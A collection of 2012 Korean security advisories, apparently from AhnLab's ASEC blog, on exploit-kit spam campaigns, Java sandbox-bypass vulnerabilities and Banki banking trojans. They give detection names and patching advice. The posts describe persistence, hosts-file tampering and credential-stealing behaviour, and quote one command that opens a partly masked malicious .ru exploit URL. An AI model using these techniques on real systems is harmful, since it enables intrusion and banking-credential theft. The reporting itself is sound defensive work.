ASEC에서는 2009년부터 익스플로잇 툴킷(Web Exploit Toolkit)이라는 웹을 기반으로 하여 웹 브라우저(Web Browser)나 웹 기반 애플리케이션(Web Application)들에 존재하는 취약점들을 자동으로 악용하도록 제작된 툴킷의 위험성에 대해 언급하였다.


그리고 웹 익스플로잇 투킷의 한 종류인 블랙홀(Blackhole) 웹 익스플로잇 툴킷을 이용하여 실제 사회적 주요 이슈나 소셜 네트워크(Social Network)와 같은 일반 사람들이 관심을 가질 만한 내용들을 포함한 스팸 메일(Spam Mail)의 사회 공학(Social Engineering) 기법으로 악성코드 유포를 시도한 사례들이 다수 존재한다.


2012년 6월 - 스팸 메일과 결합된 웹 익스플로잇 툴킷


2012년 7월 - 링크드인 스팸 메일과 결합된 블랙홀 웹 익스플로잇 툴킷


2012년 8월 - 페이팔 스팸 메일과 결합된 블랙홀 웹 익스플로잇 툴킷


특히 올해 2012년 4분기에는 미국과 한국에는 대통령 선거라는 정치적인 중요한 이슈가 존재하다. 이러한 중요한 이슈를 악용하여 스팸 메일에 존재하는 악의적인 웹 사이트 링크로 유도하는 사례가 발견되었다.


이 번에 발견된 스팸 메일 사례에는 아래 이미지와 같이 미국 대통령 선거의 후보 중 한 명인 미트 롬니(Mitt Romney)가 60% 차이로 앞서고 있다는 허위 사실을 포함하여, 하단에 존재하는 웹 사이트 링크를 클릭하도록 유도하고 있다.



해당 링크를 클릭하게 될 경우에는 블랙홀 웹 익스플로잇 툴킷의 악의적인 웹 사이트로 연결되도록 설정되어 있어, 사용하는 시스템에 웹 브러우저와 웹 애플리케이션에 취약점이 존재 할 경우에는 이를 악용하여 다른 악성코드의 감염을 시도하게 된다.


이 번에 발견된 미국 대통령 선거 뉴스로 위장한 스팸 메일을 통해 유포된 악성코드들은 V3 제품 군에서 다음과 같이 진단한다. 


PDF/Exploit

Java/Cve-2012-1723

Trojan/Win32.Pakes 


현재 웹 익스플로잇 툴킷을 이용하여 다양한 악성코드를 유포 중에 있음으로 각별한 주의가 필요하다. 그리고 향후에도 미국과 한국의 대통령 선거와 관련된 사회적 중요 이슈들을 악용한 보안 위협이 발생할 가능성이 높음으로 주의가 필요하다.

저작자 표시 비영리 변경 금지
신고
Creative Commons License
Creative Commons License
Posted by 비회원

ASEC에서는 8월 29일 "오라클 자바 JRE 7 제로 데이 취약점 악용 악성코드 유포"를 통해 자바(Java) JRE에서 알려지지 않은 제로 데이(Zero-Day, 0-Day) 취약점이 발견되었으며, 이를 악용한 악성코드가 유포되었다고 공개하였다.


해당 CVE-2012-4681 자바 취약점외에도 다른 CVE-2012-0507 자바 취약점 역시 다수의 악성코드 유포에 사용되고 있다.


일반적으로 자바의 경우 JVM을 이용한 샌드박스(SandBox) 개념의 보안 기능을 운영체제에 제공하고 있다. 악의적인 코드의 경우 JVM에서 시큐리티 매니져(Security Manager)를 기준으로 차단을 하게 된다. 예를 들어 파일을 디스크에 쓰거나 실행하는 경우에 정책(Policy)에 허용 되지 않은 경우에는 해당 명령은 허용 되지 않는다.


그러나 최근에 발견된 자바 취약점을 악용하는 악성코드 제작자들은 샌드박스를 우회 하기 위해 2가지 방법을 사용하고 있다.


1. 샌드박스 자체 무력화 - CVE-2012-0507 취약점



해당 CVE-2012-0507 취약점은 AtomicReferenceArray에서 발생한다. AtomicReferenceArray 클래스의 경우 시큐리티 매니져에서 ArrayObject에 대한 타입(Type)을 체크 하지 않으며, 해당 배열 생성시 역직렬화를 하고, 역직렬화된 악의적인 코드를 doWork에 정의된 클래스가 샌드박스 밖에서 실행하도록 한다.


역직렬화를 하게 되면 메모리에 악의적인 코드가 쓰일 수 있기 때문에 시큐리티 매니져에서 해당 객체에 대해서 접근에 대한 체크가가 필요하지만, 체크 하지 않아 문제가 발생하게 된다.


2. 샌드박스 내부의 정책 우회를 위하여 시큐리티 매니져를 setSecurityManger(Null)로 우회 - CVE-2011-3544와 CVE-2012-4681 취약점


샌드박스에서 시큐리티 매니져는 정책으로서 접근제어를 수행하게 된다. 하지만 시큐리티 매니져가 무력화 될 경우 접근제어를 수행하지 않기 때문에 악의적인 코드 실행이 가능해진다.


자바는 JVM에서 명령을 수행하기 위해서는 시큐리티 매니저가 함수내에서 빈번하게 호출되며, 자바 애플릿 역시 예외가 아니다. JVM이 포함되어 있는 웹 브라우저가 애플릿이 포함된 웹 사이트 접속시 JVM으로 애플릿을 다운 받아 실행하게 된다. 이 과정에서 로컬에서 실행하기 위해서는 디스크에 파일을 쓰고 실행을 하여야 하는데, 시큐리티 매니져를 우회 하여야 악성코드를 감염 시킬 수 있게 된다.



CVE-2011-3544와 CVE-2012-4681의 경우가 시큐리티 매니져를 우회하는 취약점으로 해당 취약점들은 toString Method에서 해당 함수를 실행할 경우 시큐리티 매니져를 우회 하는 취약점이였다. 


시큐리티 매니져를 해제하기 위해서는 setSecurityManager함수를 이용하여 시큐리티 매니져를 해제 해야한다. 하지만 JRM에서 setSecurityManger(NULL)을 호출하게 되면, 에러(Error)와 함께 함수 호출에 대해 실행을 허가 하지 않지만, toString Method를 이용하게 되면 해당 함수를 호출할 수 있는 취약점이다.


이와 비슷한 원리로 작동하는 취약점이 CVE-2012-4681으로 해당 취약점은 sun.awt.SunToolkit을 이용하여 파일시스템에 대한 모든 권한을 부여함으로서 시큐리티 매니져를 비활성화하도록 한다. 


현재 앞서 설명한 자바 취약점들 모두 다수의 악성코드에서 악용되고 있음으로 오라클(Oracle)에서 제공하는 보안 패치를 설치하여야만 다른 보안 위협들로보터 시스템을 보호 할 수 있다.

저작자 표시 비영리 변경 금지
신고
Creative Commons License
Creative Commons License
Posted by 비회원

ASEC에서는 8월 29일 "오라클 자바 JRE 7 제로 데이 취약점 악용 악성코드 유포"를 통해 오라클 자바 JRE(Java Runtime Environment) 7에서 임의의 코드를 실행 할 수 있는 코드 실행 취약점(CVE-2012-4681)을 발견하였음을 공개하였다.


한국 시간으로 8월 31일 금일 자바 JRE 7에 존재하는 취약점 CVE-2012-4681을 제거 할 수 있는 보안 패치를 보안 권고문 "Oracle Security Alert for CVE-2012-4681"를 통해 공개하였다.


현재 해당 자바 JRE 7에 존재하는 취약점 CVE-2012-4681을 악용하는 JAR 파일이 공다 팩(GongDa Pack)블랙홀(Blackhole)이라 불리는 웹 익스플로잇 툴킷(Web Exploit Toolkit)을 통해 백도어 기능을 수행하는 윈도우 악성코드와 맥(Mac) 악성코드 등 지속적으로 다양한 형태의  악용 사례가 발견되고 있다.


그러므로, 오라클에서 배포 중인 해당 보안 패치를 즉시 설치하여 해당  CVE-2012-4681 취약점을 악용하는 다양한 보안 위협을 예방하는 것이 중요하다.


오라클에서 배포 중인 보안 패치를 포함한 최신 버전은 웹 사이트 "무료 Java 다운로드" 또는 "Java SE Downloads"를 통해 다운로드 가능하다.


그리고 기존 버전이 설치되어 있다면 아래와 같은 절차를 통해 자동 업데이트 및 설치가 가능하다.


1. 윈도우 제어판에서 [자바 제어판] 실행 후, 상단 [갱신] 탭을 클릭하여 [자동 갱신 확인]에 체크가 되어 있는지 확인하고 없다면 체크 하도록 한다. 그리고 하단의 [지금 갱신]을 클릭한다.



2. [자동 갱신 확인]에 체크 한 후 [지금 갱신]을 클릭하면 아래 이미지와 같이 자동 업데이트가 진행된다.



앞서 언급한 바와 같이 현재 해당 자바 JRE 7에 존재하는 취약점 CVE-2012-4681을 악용하는 사례가 존재함으로 해당 보안 패치를 즉시 설치하는 것이 중요하다.

저작자 표시 비영리 변경 금지
신고
Creative Commons License
Creative Commons License
Posted by 비회원

미국 현지 시각으로 8월 26일 보안 업체 FireEye에서 블로그 "ZERO-DAY SEASON IS NOT OVER YET"를 통해 오라클(Orcle) 자바 JRE(Java Runtime Environment) 7에서 임의의 코드를 실행 할 수 있는 코드 실행 취약점(CVE-2012-4681)을 발견하였음을 공개하였다.


현재 해당 자바 JRE 취약점은 개발 업체인 오라클에서 해당 보안 취약점을 제거할 수 있는 보안 패치를 제공하지 않고 있는 제로 데이(Zero-Day, 0-Day) 취약점으로 각별한 주의가 필요하다.


이 번에 발견된 자바 JRE 관련 제로 데이 취약점은 다음 버전의 소프트웨어에서 악용이 가능하다.


Oracle Java 7 (1.7, 1.7.0)

Java Platform Standard Edition 7 (Java SE 7)

Java SE Development Kit (JDK 7)

Java SE Runtime Environment (JRE 7)


해당 자바 JRE 관련 취약점은 최초 아래 이미지와 같이 중국에서 제작된 공다 팩(GongDa Pack)이라 불리는 웹 익스플로잇 툴킷(Web Exploit Toolkit)에서 사용되는 스크립트 악성코드를 통해 유포되었으며, 최초 유포지는 대만에 위치한 특정 시스템이다.



이 번 자바 JRE 취약점 악용을 위해 유포된 공다 팩에서 사용되는 스크립트를 디코딩 하게 되면 스크립트가 유포된 동일한 시스템에 존재하는 Appelt.jar (7,855 바이트)와 hi.exe (16,896 바이트)가 다운로드 되도록 제작되었다.


다운로드 된 Appelt.jar (7,855 바이트) 내부에는 아래 이미지와 같이 해당 CVE-2012-4681 취약점을 직접적으로 악용하도록 제작되어 있는 클래스(Class) 파일인 App.class (7,231 바이트)가 포함되어 있다.



해당 자바 JRE 취약점(CVE-2012-4681)으로 인해 실행되는 hi.exe (16,896 바이트)는 최초 실행이 되면 윈도우 시스템 폴더(C:\WINDOWS\system32\)에 mspmsnsv.dll (10,240 바이트) 파일을 생성하게 된다.


C:\WINDOWS\system32\mspmsnsv.dll 


그리고 윈도우 시스템에 존재하는 정상 프로세스인 svchost.exe를 실행하여 해당 프로세스의 스레드로 생성한 mspmsnsv.dll (10,240 바이트)을 인젝션하게 된다.


인젝션이 성공하게 되면 특정 도메인명을 가진 C&C 서버와 통신을 시도하나 분석 당시에는 정상적인 접속이 이루어지지 않았다. 정상적으로 접속이 성공하게 되면 원격 제어 등의 공격자가 의도하는 백도어 기능을 수행하게 된다.


추가적으로 핀란드 보안 업체 F-Secure에서는 블로그 "Blackhole: Faster than the speed of patch"를 통해 블랙홀 웹 익스플로잇 툴 킷(Blackhole Web Exploit Toolkit)을 통해서도 유포 중에 있는 것으로 공개하였다.


ASEC에서 이와 관련한 추가 정보들을 확인하는 과정에서 사회 공학 기법을 악용한 이메일을 통해 최소 약 300개의 도메인을 이용해  유포 중인 것으로 파악하였다.


현재 블랙홀 웹 익스플로잇 툴 킷을 통해 유포 중인 CVE-2012-4681 취약점을 악용하는 JAR 파일은 Pre.jar (31,044 바이트)Leh.jar (31,044 바이트) 파일명으로 유포 중이나 2개 모두 동일한 파일이다. 그러나 현재 언더그라운드에서는 해당 취약점을 악용 가능한 PoC(Proof of Concept)가 공개되어 있음으로 다양한 변형들이 지속적으로 유포될 것으로 예측된다.


이 번에 발견된 자바 JRE 7에서 임의의 코드를 실행 할 수 있는 코드 실행 취약점(CVE-2012-4681)을 악용하는 악성코드들 모두 V3 제품 군에서 다음과 같이 진단한다.


JS/Downloader

JAVA/CVE-2012-4681

JS/Blacole

Win-Trojan/Poison.16898 

Win-Trojan/Buzus.153447

Trojan/Win32.Npkon


그리고 네트워크 보안 장비인 트러스가드(TrusGuard) 제품군에서는 해당 취약점을 악용한 공다 팩 스크립트 악성코드와 취약한 클래스 파일을 포함한 JAR 파일을 다음과 같이 탐지 및 차단이 가능하다.


javascript_malicious_gongda-2(HTTP)

java_malicious_jar-8(HTTP)

java_malicious_jar-gd(HTTP)


앞서 언급한 바와 같이 현재 자바 JRE에서 발견된 취약점은 제로데이 취약점으로 자바 개발 업체인 오라클에서 보안 패치를 제공하지 않고 있다.


이와 관련하여 US-CERT에서는 보안 권고문 "Oracle Java JRE 1.7 Expression.execute() and SunToolkit.getField() fail to restrict access to privileged code" 을 통해 아래와 같은 사항들을 임시 방안으로 권고하고 있다.


* 자바 플러그인 비활성화


- 파이어폭스 (Firefox)

파이어폭스 실행 후 상단의 [도구]->[부가 기능]을 클릭한다. 그 중에서 "플러그인"을 선택 후 자바 관련 플러그인들을 "사용안함"으로 설정한다.


- 사파리(Safari)

[기본 설정]을 클릭후 [보안]을 선택한다. 그리고 "Java 활성화"에 체크 마크를 해제한다.



- 크롬(Chrome)

크롬을 실행 후 주소 창에 "chrome://plugins/"을 입력한 후, "JAVA Plug-in"을 사용 중지한다.


- 인터넷 익스플로러(Internet Explorer)

윈도우 제어판을 실행 훈 "Java 제어판" -> [고급]을 선택 한 후 [브라우저용 기본 Java]에서 [Microsoft Internet Explorer]에 체크 마크를 해제한다.



앞서 언급한 바와 같이 현재 해당 취약점은 보안 패치가 제공되지 않는 제로 데이 취약점임으로 각별한 주의가 필요하다. 그리고 언더그라운드에는 이미 해당 취약점을 악용 할 수 있는 PoC 코드가 공개 되었음으로 다양한 보안 위협에서 해당 취약점을 악용 할 가능성이 높을 것으로 예측 된다.

저작자 표시 비영리 변경 금지
신고
Creative Commons License
Creative Commons License
Posted by 비회원

ASEC에서는 2012년 5월 월간 "안"을 통해 공다 팩(GongDa Pack)으로 명명된 중국에서 제작된 웹 익스플로잇 툴 킷(Web Exploit Toolkit)에 대한 상세한 분석 정보에 대해 공개한 사례가 있다. 


2012-05-08 'GongDa'의 무차별 웹 공격이 시작됐다


공다 팩이라는 해당 웹 익스플로잇 툴킷의 스크립트 악성코드는 다양한 일반 어플리케이션들의 취약점을 악용하여 온라인 게임 관련 개인 정보들을 탈취하는 악성코드 유포를 목적으로 하고 있었다.


이러한 공다 팩에서 사용되는 스크립트 악성코드가 최근 몇 주 사이 지속적으로 발견되고 있으며, 업데이트 된 공다 팩 변형에 의해 유포되는 것으로 확인되었다.


최초 2012년 5월에 발견된 공다 팩에서 사용되는 스크립트 악성코드는 버전이 "JSXX 0.41"로 표기되어 있으나, 최근에 다시 발견되고 있는 스크립트 악성코드들의 경우 아래 이미지와 동일하게 "JSXX 0.44"로 표기 되어 있다.



해당 업데이트 된 버전의 공다 팩을 이용해 유포되는 스크립트 악성코드들은 V3 제품군에서 다음과 같이 진단한다. 하지만 다수의 변형들이 지속적으로 발견되고 있음으로 주의가 필요하다.


HTML/Downloader


그리고 네트워크 보안 장비인 트러스가드(TrusGuard) 제품군에서는 다음과 같이 탐지 및 차단이 가능하다.


pack_malicious_gongda(HTTP)

pack_malicious_gongda-2(HTTP)


공다 팩과 같은 웹 익스플로잇 툴킷들은 어도비 플래쉬(Adobe Flash)와 자바(JAVA)와 같은 일반 어플리케이션들의 취약점을 악용하여 다른 악성코드들의 감염을 시도하는 특징이 있음으로, 운영 체제를 포함한 자주 사용하는 어플리케이션들의 취약점을 제거할 수 있는 보안 패치들을 주기적으로 설치하는 것이 중요하다.

저작자 표시
신고
Creative Commons License
Creative Commons License
Posted by 비회원

ASEC에서는 6월 5일 웹 익스플로잇 툴킷(Web Exploit Toolkit)의 일종인 블랙홀(Blackhole) 웹 익스플로잇 툴 킷이 스팸 메일(Spam Mail)과 결합되어 유포되었다는 사실을 밝힌 바가 있다.


금일 블랙홀 웹 익스플로잇 툴 킷과 결합된 스팸 메일이 다시 발견되었으며, 이 번에 발견된 스팸 메일은 사용자가 많은 유명 소셜 네트워크(Social Network) 서비스인 링크드인(LinkedIn)의 초대 메일로 위장하여 유포되었다.


이 번에 발견된 링크드인 스팸 메일과 결합된 형태로 유포된 블랙홀 웹 익스플로잇 툴킷은 아래 이미지와 같이 다양한 취약점들을 악용하고 있으며 최종적으로 감염된 PC에서 사용자 정보들을 탈취하기 위한 악성코드 감염을 목적으로 하고 있다.



링크드인의 초대 메일로 위장해 유포된 스팸 메일은 아래 이미지와 같은 형태를 가지고 있으며, [Accept] 부분은 정상적인 링크드인 웹 페이지로 연결되는 것이 아니라 중국에 위치한 특정 시스템으로 연결되도록 구성되어 있다.



해당 [Accept] 부분을 클릭하게 되면 중국에 위치한 특정 시스템으로 접속하며, PC 사용자에게는 아래와 같은 이미지를 보여주게 된다.



그러나 실제 해당 웹 페이지 하단에는 아래 이미지와 같이 웹 페이지 하단에는 다른 러시아에 위치한 시스템으로 연결되는 자바 스크립트 코드가 인코딩 되어 있다.



해당 자바 스크립트 코드를 디코딩하게 되면 아래 이미지와 같이 iFrame 으로 처리된 코드가 나타나며, 사용자 모르게 러시아에 위치한 블랙홀 웹 익스플로잇 툴킷이 설치되어 있는 시스템으로 연결하게 된다.



해당 블랙홀 웹 익스플로잇 툴킷에 성공적으로 연결하게 되면 웹 브라우저에 의해 CMD 명령으로 윈도우 미디어 플레이(Windows Media Player) 취약점을 악용하기 위한 시도를 하게 된다. 그러나 분석 당시 해당 취약점은 정상적으로 악용되지 않았다.


"C:\Program Files\Windows Media Player\wmplayer.exe" /open http://************.ru:8080/forum/data/hcp_asx.php?f=182b5"


그리고 두 번째로 자바(JAVA)와 인터넷 익스플로러(Internet Explorer)에 존재하는 알려진 취약점을 악용하기 위한 스크립트 파일이 실행된다.



세 번째로 어도비 아크로뱃 리더(Adobe Acrobat Reader)에 존재하는 알려진 취약점을 악용하기 위한 PDF 파일을 아래 이미지와 같이 다운로드 후 실행 하게 된다.



해당 링크드인 스팸 메일을 수신한 PC에 위에서 언급한 4개의 취약점 중 하나라도 존재 할 경우에는 동일한 시스템에서 wpbt0.dll (127,648 바이트)를 다운로드하여 다음 경로에 생성하게 된다.


C:\Documents and Settings\Tester\Local Settings\Temp\wpbt0.dll


그리고 생성된 wpbt0.dll (127,648 바이트) 는 다시 자신의 복사본을 아래 경로에 KB01458289.exe (127,648 바이트)라를 명칭으로 복사하게 된다.


C:\Documents and Settings\Tester\Application Data\KB01458289.exe


감염된 PC의 레지스트리에 다음 키 값을 생성하여 PC가 재부팅 할 때마다 자동 실행 되도록 구성하였다.


HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\

KB01458289.exe = C:\Documents and Settings\Tester\Application Data\KB01458289.exe


그리고 감염된 PC에서 실행 중인 모든 정상 프로세스의 스레드로 자신의 코드 일부분을 삽입한 후 다음의 정보들을 후킹하게 된다.


웹 사이트 접속 정보

FTP 시스템 접속 사용자 계정과 비밀 번호 정보

POP3 이용 프로그램 사용자 계정과 비밀 번호 정보

웹 폼 변조(Formgrabber) 및 웹 폼 인젝션 (httpinjects)으로 웹 사이트 사용자 계정과 암호 정보


감염된 PC에서 수집된 정보들 모두는 아래 이미지와 같이 악성코드 내부에 하드코딩 되어 있는 특정 시스템들으로 후킹한 데이터들 전부를 인코딩하여 전송하게 된다.



그리고 마지막으로 감염된 PC 사용자에게는 아래 웹 페이지와 같이 연결을 시도한 웹 페이지를 보여주어 정상적인 접속이 실패한 것으로 위장하게 된다.



이 번에 발견된 링크드인 스팸 메일과 결합된 블랙홀 웹 익스플로잇 툴킷에서 유포한 악성코드들은 V3 제품군에서 모두 다음과 같이 진단한다.


JS/Iframe

Packed/Win32.Krap

PDF/Exploit
JS/Exploit

링크드인 스팸 메일과 결합된 블랙홀 웹 익스플로잇 툴킷에서 유포를 시도한 악성코드는 기존에 발견된 온라인 뱅킹 정보 탈취를 목적으로하는 제우스(Zeus) 또는 스파이아이(SpyEye)와 유사한 웹 폼 변조(Formgrabber) 및 웹 폼 인젝션 (httpinjects) 기능으로 웹 사이트 사용자 계정과 암호 정보를 탈취 할 수 있다.


이는 악성코드 유포자가 의도하는 대부분의 웹 사이트들에서 사용자 계정과 비밀 번호 정보를 탈취 할 수 있음으로, 단순 스팸 메일로 판단되더라도 송신자가 불명확한 메일에 포함된 웹 사이트 연결 링크를 클릭하지 않는 주의가 필요하다.

저작자 표시
신고
Creative Commons License
Creative Commons License
Posted by 비회원

온라인 뱅킹에 사용되는 개인 금융 정보를 탈취하는 Banki 트로이목마 변형들이 지속적으로 유포되고 있는 것이 금일 새벽 다시 발견되었다.


ASEC에서는 Banki 트로이목마 변형이 유포 중인 사실을 7월 11일과 16일 공개하였으며, 그 유포 방식에 있어서도 7월 11일 취약한 웹 사이트를 통해 웹 브라우저와 자바(JAVA) 취약점을 악용한 형태로 유포되었으며, 7월 16일 공개시에는 14일과 15일 주말 사이 사용자가 많은 웹 하드 프로그램의 웹 사이트를 통해 유포되었다.


금일 새벽 다시 발견된 Banki 트로이목마 변형은 아래 이미지와 같이 구글(Google)에서 운영하는 구글 코드 웹 페이지를 통해 유포되었다.



ASEC은 구글 시큐리티(Google Security) 팀과 협력으로 현재 Banki 트로이목마 변형이 업로드 되어 있는 해당 구글 코드의 특정 웹 페이지 자체를 삭제한 상태이다.


이번 구글 코드의 특정 웹 페이지를 통해 유포된 Banki 트로이목마 변형은 기존에 발견된 변형들과 유사한 형태로 제작 및 구성 되어 있으며, 아래 이미지와 같은 형태로 동작하게 되어 있다.



금일 새벽 발견된 Banki 트로이 목마 변형은 기존 변형들과 동일하게 RARSfx로 압축되어 있으며, aax.exe (167,310 바이트)이 실행되면 윈도우 시스템 폴더에 다음 파일들을 생성하게 된다.


C:\WINDOWS\system32\WindowsDirectx.exe (180,224 바이트)

C:\WINDOWS\system32\ServiceInstall.exe (61,440 바이트)


그리고 생성된 WindowsDirectx.exe (180,224 바이트)은 일본에 위치한 특정 시스템으로 접속을 시도하게 되며 접속이 성공하게 될 경우에는 RARSfx로 압축된 74.exe (413,304 바이트)를 다운로드 후 실행하게 된다.


다운로드 된 74.exe (413,304 바이트)가 실행되면 윈도우 폴더에 다음 파일들을 생성하게 된다.


C:\WINDOWS\HDSetup.exe (442,368 바이트) 

C:\WINDOWS\CretClient.exe (720,896 바이트)


그리고 CONFIG.INI (29 바이트)에는 홍콩에 위치한 특정 시스템의 IP가 기록되어 있으며, 생성된 HDSetup.exe (442,368 바이트) 는 이를 참조하여 감염된 PC에 존재하는 hosts 파일을 다음과 같이 변경하게 된다.



그러나 금일 새벽에 발견된 변형은 특이하게 안랩의 도메인을 포함하여 탐지 및 발견을 우회하고자 한 점이 특이 사항이라고 볼 수 잇다.


금일 발견된 Banki 트로이 목마 변형들과 관련 악성코드들은 모두 V3 제품군에서 다음과 같이 진단한다.


Dropper/Win32.Banki

Trojan/Win32.Banki

Trojan/Win32.Scar


해당 Banki 트로이목마 변형이 유포 중인 구글 코드 웹 페이지의 다운로드 수가 300건이 넘는 것으로 미루어 해당 악성코드 제작자는 다른 취약한 웹 페이지와 연동하여 다운로드 가능 하도록 설정한 것으로 추정된다.


그러므로 사용하는 운영체제와 일반 어플리케이션들의 취약점을 제거할 수 잇는 보안 패치 설치와 함께 사용하는 보안 제품을 최신 버전으로 유지하는 것이 중요하다.

저작자 표시
신고
Creative Commons License
Creative Commons License
Posted by 비회원

ASEC에서는 7월 11일 취약한 웹 사이트를 통해 온라인 뱅킹에 사용되는 개인 금융 정보 탈취를 목적으로하는 Banki 트로이목마 변형이 유포되었음을 공개하였다.


개인 금융 정보 탈취를 목적으로하는 Banki 트로이목마 변형이 7월 14일과 15일 주말 사이 사용자가 많은 웹 하드 프로그램 웹 사이트의 설치 파일을 변경하여 유포된 사례가 발견되었다.


이번에 유포된 Banki 트로이목마 변형은 보안 관리가 상대적으로 취약한 웹 하드 프로그램의 웹 사이트에서 배포 중인 설치 파일을 RARSfx로 악성코드와 정상 설치 파일을 압축한 파일을 배포 중인 정상 설치 파일과 변경하여, 사용자로 하여금 악성코드가 포함된 변경된 설치 파일을 다운로드하도록 하였다.



정상 웹 하드 설치 파일을 변경하여 유포된 Banki 트로이목마 변형이 동작하는 전체적인 구조를 도식화 한 이미지는 아래와 같다.



웹 하드 프로그램의 웹 페이지에서 배포 중인 웹 하드 프로그램의 설치 파일은 RARSfx 파일로 압축된 파일로 변경되어 있으며, 변경된 파일 내부에는 아래와 같이 정상 설치 파일과 함께 RARSfx로 압축된 btuua.exe (174,624 바이트)이 포함되어 있다.



해당 변경된 파일을 실행하게 되면 윈도우 폴더의 임시 폴더(temp)에 다음 파일들을 생성하게 된다.


C:\winodws\temp\btuua.exe (174,624 바이트)

C:\winodws\temp\******_Setup.exe (9,918,872 바이트)


그리고 아래 이미지와 같이 정상 웹 하드 프로그램인 ******_Setup.exe의 설치가 진행된다.



그리고 정상 웹 하드 프로그램 설치와 동시에 생성된 RARSfx로 압축된 btuua.exe (174,624 바이트) 파일 내부에는 아래 이미지와 같이 ServiceInstall.exe (69,632 바이트)와 WindowsDirectx.exe (172,032 바이트)가 포함되어 있다.



btuua.exe (174,624 바이트)는 내부에 포함된 파일들을 다음과 같이 윈도우 시스템 폴더에 생성하고 실행하게 된다.


C:\WINDOWS\system32\ServiceInstall.exe (69,632 바이트)

C:\WINDOWS\system32\WindowsDirectx.exe (172,032 바이트)


생성된 ServiceInstall.exe (69,632 바이트)는 WindowsDirectx.exe (172,032 바이트)를 레지스트리 변경을 통해 윈도우 서비스로 등록시켜, 감염된 시스템이 재부팅 하더라도 자동 실행되도록 구성한다.


HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\

ImagePath = C:\windows\system32\WindowsDirectx.exe


그리고 WindowsDirectx.exe (172,032 바이트)가 실행이 되면 일본에 위치한 특정 시스템으로 접속을 시도하여 접속이 성공하게 될 경우에는 RARSfx로 압축된 58.exe (517,112 바이트)를 다운로드하게 된다. 


다운로드된 RARSfx로 압축된 58.exe (517,112 바이트) 파일 내부에는 아래 이미지와 같이 CONFIG.INI (29 바이트), CretClient.exe (708,608 바이트)와 HDSetup.exe (458,752 바이트) 파일들이 포함되어 있다.



58.exe (517,112 바이트) 파일이 실행되면 다음 경로에 내부에 포함된 파일들을 생성하게 된다.


C:\WINDOWS\CretClient.exe (708,608 바이트)

C:\WINDOWS\HDSetup.exe (458,752 바이트)


생성된 파일 HDSetup.exe (458,752 바이트)은 기존 변형들과 동일하게 동일하게 아래 이미지와 같이 hosts 파일을 변조하여 온라인 뱅킹을 위해 금융 기관 웹 사이트에 접속하게 될 경우, 홍콩에 위치한 시스템으로 연결하도록 구성하게 된다.



이 번에 발견된 온라인 뱅킹을 위한 개인 금융 정보 탈취를 노리는 Banki 트로이목마 변형들과 관련 악성코드들 모두 V3 제품군에서 다음과 같이 진단한다.


Dropper/Win32.Banki

Trojan/Win32.Scar

Trojan/Win32.Banki


현재까지 온라인 뱅킹 관련 개인 금융 정보 탈취를 노리는 Banki 트로이목마가 유포되는 방식은 2가지로 나누어 볼 수 있다.


첫 번째는, 취약한 웹 사이트를 통해 기존 온라인 게임 관련 개인 정보를 탈취하던 악성코드와 동일한 기법으로 취약한 일반 어플리케이션의 취약점을 악용해 유포되는 방식으로 사용되었던 취약점들은 다음과 같다.



두 번째로는 이 번과 같이 상대적으로 보안 관리가 취약한 웹 하드 프로그램 배포 웹 사이트를 해킹한 후 웹 하드 프로그램의 설치 파일을 악성코드가 포함되어 있는 파일로 변경하는 것이다.


이러한 두 가지 유포 사례들로 인해 웹 하드 프로그램을 자주 사용하는 사용자들은 배포그램의 자동 업데이트나 설치 파일의 재설치시 각별한 주의가 필요하다.


그리고 이와 동시에 윈도우 시스템과 자주 사용하는 일반 어플리케이션들의 취약점을 제거할 수 있는 보안 패치 설치에 주의를 기울여야 된다.


저작자 표시
신고
Creative Commons License
Creative Commons License
Posted by 비회원

ASEC에서는 6월 26일 현재까지도 제로 데이(Zero Day, 0-Day) 취약점인 XML 코어 서비스 취약점(CVE-2012-1889)을 악용한 공격 사례들이 발생하고 있다고 공유한 바가 있다.


금일 해당 XML 코어 서비스 취약점을 악용한 다른 형태의 공격 사례가 발견되었으며, 해당 공격 사례는 XML 코어 서비스 뿐 만이 아니라 자바(JAVA)와 어도비 플래쉬(Adobe Flash) 취약점까지도 같이 악용하고 있는 것으로 파악되었다.


이 번에 발견된 XML 코어 서비스 취약점을 악용한 사례는 블랙홀(Blackhole)과 같은 웹 익스플로잇 툴킷(Web Exploit Toolkit) 형태로 스크립트 악성코드들을 기능별로 분류하여 단계적으로 취약점을 악용하도록 하고 있다.


이러한 단계적으로 취약점을 악용한 공격 형태는 아래 이미지와 같은 전체적인 구조를 가지고 있어, 일부 스크립트들만 분석하여서는 전체적인 공격 및 취약점 형태를 파악하기 어렵도록 하고 있다.



현재 해당 XML 코어 서비스 취약점 등을 악용한 공격 형태는 SQL 인젝션(Injection) 공격 기법 등으로 취약한 웹 페이지의 하단에 Exploit.html 웹 페이지로 연결되는 아이프레임(iFrame) 코드를 삽입하여, 웹 사이트 방문자 모르게 아래의 취약점들 중 하나가 자동으로 악용되도록 구성되어 있다.



해당 취약점들이 정상적으로 동작하게 될 경우에는 중국에 위치한 특정 시스템으로부터 win.exe (30,720 바이트)의 파일이 다운로드 및 실행하게 된다.


해당 win.exe (30,720 바이트) 파일은 XOR로 인코딩(Encoding) 되어 있는 파일로 이를 디코딩하게 되면 비주얼 C++(Visual C++)로 제작된 실행가능한 PE 파일이 생성된다.


다운로드 된 win.exe (30,720 바이트) 파일이 정상적으로 디코딩(Decoding) 된 이후에 실행되면, 다음의 배치(BAT) 파일들과 텍스트(TXT) 파일을 순차적으로 생성하게 된다.


C:\4.bat (66 바이트)

C:\2.txt (100 바이트)

C:\3.bat (15 바이트)


win.exe (30,720 바이트) 파일에 의해 생성된 4.bat (66 바이트)는 시스템 공유 폴더와 윈도우 방화벽을 강제로 종료하게 된다. 


그리고 2.txt는 미국에 위치한 특정 FTP 서버로 접속하는 정보들이 기록되어 있으며, 3.bat (15 바이트)는 해당 FTP 정보들을 바탕으로 커맨드라인(Command-Line) 명령으로 접속을 시도하는 역할을 하게 된다.


FTP 접속 정보들은 아래 이미지와 같이 win.exe (30,720 바이트) 파일 내부에 하드코딩되어 있는 상태로 기록되어 있다.



그러나 분석 당시에는 해당 FTP 서버로 정상적인 접속이 이루어지지 않았으며, 정상적인 접속이 이루어지게 될 경우에는 감염된 시스템에 설치되어 있는 보안 제품 정보들을 전송할 것으로 추정된다.


해당 XML 코어 서비스와 다른 취약점들을 악용한 악성코드들은 2012.06.28.05 엔진 버전 이후의 V3 제품군에서 모두 다음과 같이 진단한다.


JS/CVE-2012-1889 

HTML/Downloader

